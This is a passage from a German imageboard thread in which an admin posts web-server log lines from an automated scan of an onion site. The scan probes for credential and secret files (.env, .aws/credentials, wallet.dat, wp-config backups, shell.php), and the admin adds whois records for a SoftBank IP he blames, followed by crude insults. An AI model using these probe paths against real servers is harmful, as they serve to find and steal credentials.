    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:44 +0000] "GET /secret/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:45 +0000] "GET /server-info HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:45 +0000] "GET /server-status HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:46 +0000] "GET /settings.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:47 +0000] "GET /shell.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:48 +0000] "GET /site.tar.gz HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:48 +0000] "GET /site.tgz HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:49 +0000] "GET /site.zip HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:50 +0000] "GET /site/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:51 +0000] "GET /sql.tar.gz HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:51 +0000] "GET /sql.tgz HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:52 +0000] "GET /sql.zip HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:53 +0000] "GET /stats/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:54 +0000] "GET /status HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:55 +0000] "GET /test/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:56 +0000] "GET /tests/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:56 +0000] "GET /upload.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:57 +0000] "GET /upload/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:58 +0000] "GET /uploads/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:59 +0000] "GET /wallet.dat HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:00 +0000] "GET /wallet.zip HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:00 +0000] "GET /web/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:01 +0000] "GET /webalizer/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:02 +0000] "GET /webdav/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:03 +0000] "GET /wp-admin HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:03 +0000] "GET /wp-json/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:04 +0000] "GET /wp-admin/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:05 +0000] "GET /pgp.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:05 +0000] "GET /omg.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:06 +0000] "GET /mirrors.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:07 +0000] "GET /canary.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:08 +0000] "GET /related.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:09 +0000] "GET /robots.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:10 +0000] "GET /Robots.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:10 +0000] "GET /hosts.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:11 +0000] "GET /Hosts.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:12 +0000] "GET /_profiler/phpinfo HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:12 +0000] "GET /tool/view/phpinfo.view.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:13 +0000] "GET /debug/default/view.html HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:14 +0000] "GET /frontend/web/debug/default/view HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:14 +0000] "GET /.aws/credentials HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:15 +0000] "GET /config/aws.html HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:16 +0000] "GET /symfony/public/_profiler/phpinfo HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:16 +0000] "GET /conf/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:17 +0000] "GET /wp-content/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:18 +0000] "GET /library/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:19 +0000] "GET /vendor/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:20 +0000] "GET /api/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:20 +0000] "GET /laravel/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:21 +0000] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:22 +0000] "GET /debug/default/view/view?panel=config HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:23 +0000] "GET /web/debug/default/view HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:24 +0000] "GET /sapi/debug/default/view HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:24 +0000] "GET /wp-config.php-backup HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:25 +0000] "GET /checkout/ HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:26 +0000] "GET /sitemap.xml HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:27 +0000] "GET /manifest.json HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:42:28 +0000] "GET /deposit.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    


    Kannste dir net ausdenken.
  • [l] Zuse ## Admin Wed, 07 Jan 2026 16:23:54 GMT Nr. 161356 SÄGE
    Ach übrigens, die Pizza neulich? Die kam mal wieder von SOFTBANK (126.110.173.20). Schon zum dritten mal oder so. Da hilft wohl nur noch "thermonuclear name & shame".

    % [whois.apnic.net]
    % Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html
    
    % Information related to '126.64.0.0 - 126.127.255.255'
    
    % Abuse contact for '126.64.0.0 - 126.127.255.255' is 'abuse@e.softbank.co.jp'
    
    inetnum:        126.64.0.0 - 126.127.255.255
    netname:        BBTEC
    descr:          Japan Nation-wide Network of Softbank Corp.
    country:        JP
    org:            ORG-SC4-AP
    admin-c:        SA421-AP
    tech-c:         SA421-AP
    abuse-c:        AS2391-AP
    status:         ALLOCATED PORTABLE
    remarks:        --------------------------------------------------------
    remarks:        To report network abuse, please contact mnt-irt
    remarks:        For troubleshooting, please contact tech-c and admin-c
    remarks:        Report invalid contact via www.apnic.net/invalidcontact
    remarks:        --------------------------------------------------------
    mnt-by:         APNIC-HM
    mnt-lower:      MAINT-JP-BBTECH
    mnt-routes:     MAINT-JP-BBTECH
    mnt-irt:        IRT-SOFTBANK-JP
    last-modified:  2023-07-12T22:54:51Z
    source:         APNIC
    
    irt:            IRT-SOFTBANK-JP
    address:        Tokyo Portcity Takeshiba Office Tower 21F
    address:        1-7-1, Kaigan
    address:        Minatoku,Tokyo, Japan
    e-mail:         abuse@e.softbank.co.jp
    abuse-mailbox:  abuse@e.softbank.co.jp
    admin-c:        KF291-AP
    tech-c:         KF291-AP
    auth:           # Filtered
    remarks:        abuse@e.softbank.co.jp was validated on 2025-11-05
    mnt-by:         MAINT-JP-BBTECH
    last-modified:  2026-01-06T10:49:11Z
    source:         APNIC
    
    organisation:   ORG-SC4-AP
    org-name:       SOFTBANK Corp.
    org-type:       LIR
    country:        JP
    address:        Tokyo Portcity Takeshiba Office Tower 22F
    address:        1-7-1, Kaigan
    phone:          +81-3-6889-6365
    e-mail:         GRP-nic-admin@g.softbank.co.jp
    mnt-ref:        APNIC-HM
    mnt-by:         APNIC-HM
    last-modified:  2023-09-05T02:14:51Z
    source:         APNIC
    
    role:           ABUSE SOFTBANKJP
    country:        ZZ
    address:        Tokyo Portcity Takeshiba Office Tower 21F
    address:        1-7-1, Kaigan
    address:        Minatoku,Tokyo, Japan
    phone:          +000000000
    e-mail:         abuse@e.softbank.co.jp
    admin-c:        KF291-AP
    tech-c:         KF291-AP
    nic-hdl:        AS2391-AP
    remarks:        Generated from irt object IRT-SOFTBANK-JP
    remarks:        abuse@e.softbank.co.jp was validated on 2025-11-05
    abuse-mailbox:  abuse@e.softbank.co.jp
    mnt-by:         APNIC-ABUSE
    last-modified:  2025-11-05T01:56:02Z
    source:         APNIC
    
    role:           SoftbankBB ABUSE
    address:        Tokyo Portcity Takeshiba Office Tower 22F,  1-7-1, Kaigan, Minatoku,Tokyo
    country:        JP
    phone:          +81-3-6688-5120
    e-mail:         abuse@e.softbank.co.jp
    remarks:        Please send spam report,virus alart
    remarks:        or any other abuse report
    remarks:        to  abuse@e.softbank.co.jp
    remarks:        Any other Information, Notice,
    remarks:        Please send to hostmaster@bbtec.net
    admin-c:        KF291-AP
    tech-c:         KF291-AP
    nic-hdl:        SA421-AP
    mnt-by:         MAINT-JP-BBTECH
    last-modified:  2024-03-26T02:44:48Z
    source:         APNIC
    
    % This query was served by the APNIC Whois Service version 1.88.34 (WHOIS-UK2)
    

  • [l] Felix Thu, 08 Jan 2026 15:24:42 GMT Nr. 161370
    >>161356
    Beschämender Monitor.
  • [l] Felix Fri, 09 Jan 2026 10:48:59 GMT Nr. 161376 SÄGE
    >>161370
    Deine Mama ist beschämend.
  • [l] Felix Fri, 09 Jan 2026 11:01:47 GMT Nr. 161377
    >>161376
    Aber geil, räudig und fickbar.


[Zurück]
[c] [meta] [fefe] [erp]